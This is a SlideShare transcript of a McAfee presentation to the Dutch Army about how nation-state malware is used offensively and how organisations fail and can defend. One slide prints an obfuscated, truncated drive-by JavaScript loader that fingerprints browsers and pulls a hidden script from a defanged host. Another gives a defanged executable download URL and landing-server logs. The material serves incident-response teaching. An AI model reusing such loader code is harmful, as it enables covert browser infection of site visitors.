Offensive malware usage and defense


Published on

Presentation for the Dutch Army around cyberwarfare and the usage of malware.

Published in: Technology
  • Be the first to comment

No Downloads
Total views
On SlideShare
From Embeds
Number of Embeds
Embeds 0
No embeds

No notes for slide

Offensive malware usage and defense

  1. Malware Offensive usage and how to defendChristiaan BeekMcAfee Professional Services
  2. Agenda• $whoami• Examples• Offensive ways of using malware• What goes wrong• Defense recommendations• Final thoughts
  3. > whoami• Christiaan Beek• Practice lead IR & Forensics EMEA• Developer/Instructor MFIRE• Training CERTS
  4. A Little BackgroundFoundstone Services – McAfee Strategic Security
  6. Offensive usage of malware ENERGY & INFRA Financial MEDICAL MOBILE Defense
  7. Offensive usage of malwareWhy malware?• low profile during preparation• many options to spread / infect• many ways to hide• self destruct mechanism• many ways to transfer data to
  8. Offensive usage of malware• More and more discovery of malware frameworks• Multiple modules /components• Written by pro’s – sponsored by nations
  9. Offensive - What’s Different? Development Delivery Detection Command & Control Intent• Nation-States • Zero day • Digitally signed • Central • Surveillance propagation with command• Truly compromised • Disrupt / customized • Multi-vectored: certificates • Modular Destroy payloads Blue tooth, payloads USB, network • Outbound ex- filtration masking
  10. Stages of an attack:
  11. Stages of an attack:
  12. Stages of an attack:
  13. Stages of an attack:
  14. Stages of an attack – first script script type="text/javascript" src="swfobject.js"></script> <script src=jpg.js></script> <script type="text/javascript"> if(document.cookie.indexOf("DCHJEik8=")==-1 && hiOC2.indexOf("linux")<=-1 && hiOC2.indexOf("bot")==-1 && hiOC2.indexOf("spider")==-1) var jMJFRp3=deconcept.SWFObjectUtil.getPlayerVersion(); var expires=new Date(); expires.setTime(expires.getTime()+1*60*60*1000); document.cookie="DCHJEik8=Yes;path=/;expires="+expires.toGMTString(); for(WdkimKX2=0,gNRb4=true,sAgnGw8=["msie","firefox","opera"];gNRb4;WdkimKX2++){gNRb4=gNRb4 && (navigator.userAgent.toLowerCase().indexOf(sAgnGw8[WdkimKX2])>-1);if(WdkimKX2==sAgnGw8.length- 1)WdkimKX2=-1;}Hwqq6="0";delete Hwqq6;try{Hwqq6+="0"+"0";}catch(e){yltBe1=unescape;mYSdOxl6 = eval;}CwefLf0=“S1+ADphS1(hmacmx8)))^MqiovxR7);}try{new function(){EmIcO0(EJiD6);}}catch(e){try{new function(){Qkrnq6=parseInt;vKFaTPR4(EJiD6);}}catch(e) } </script> <DIV style="VISIBILITY: hidden; WIDTH: 0px; HEIGHT: 0px"><script language="javascript" src="hxxp://count2.51yes……….. 31931&logo=12" charset="gb2312"></script></DIV>
  15. Final destination?: hxxp://222.7x.xx.xx.xx/x.exe
  16. Inner working?
  17. IIS logs on hacked ‘landing’ server: 9/23/2012 4:06:16 70.49.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:07:46 99.23.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:08:25 93.80.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:14:48 208.91.x.x W3SVC1 80 GET /x.exe 9/23/2012 4:36:05 95.27.x.x W3SVC1 80 GET /pay/x.exe 9/23/2012 5:15:23 208.91.x.x W3SVC1 80 GET /x.exe 9/23/2012 5:29:27 74.125.x.x W3SVC1 80 GET /x.exe Dial 80 Or 443
  18. War story
  19. Future usage of malware
  20. Future scenario’s
  21. Future scenario’s or real...?
  22. Future scenario’s
  23. Future scenario’s
  24. Future scenario’s
  25. Future scenario’s
  26. Future scenario’s
  27. Future scenario’s
  28. What goes wrong regarding Defense? An Intel company
  29. Problem #1 An Intel company Many solutions but how to use them? Forensic Readiness?
  30. Problem #2 An Intel company No visibility on the network No correlation of events
  31. Problem #3 An Intel companyLack of skilled,experienced anddedicated people
  32. Problem #4 An Intel company No Incident Response procedures No Dry-run exercise
  33. Problem #5 An Intel companyThe attack camefrom…..
  34. Problem #6 An Intel company Destroying evidence
  35. Problem #7 An Intel company who is the system owner? who will take action? who is allowed to take decisions?
  36. An Intel companyDefense Strategies
  37. The Big “Threat” Picture Threats Threats All Threats All Known Core AntiVirus AntiVirus Threats Sees Protects
  38. The “Core” Security Problem • “Unauthorized” Execution End Users = Data – Payload/attachment/link – Network Identity Thieves Spammers – Privilege Bot Herder • “Authorized” Execution – Insiders misuse of privilege Vulnerability Tool Discoverers Developers 100101010010110 Malware Developers
  39. Defense-in-depth
  40. Worthless without:
  41. Final thoughts...... An Intel company - Incidents happen - Is forensic & malware readiness on your agenda? - What needs to be changed in your process? - Is your {army-unit/company/agency/etc} prepared? - Did you separate critical infrastructures? - Can we help you?
  42. Thank you! An Intel companyKeep in touch:Email: Christiaan_Beek@McAfee dot comTwitter: @FSEMEA @Foundstone @ChristaanBeek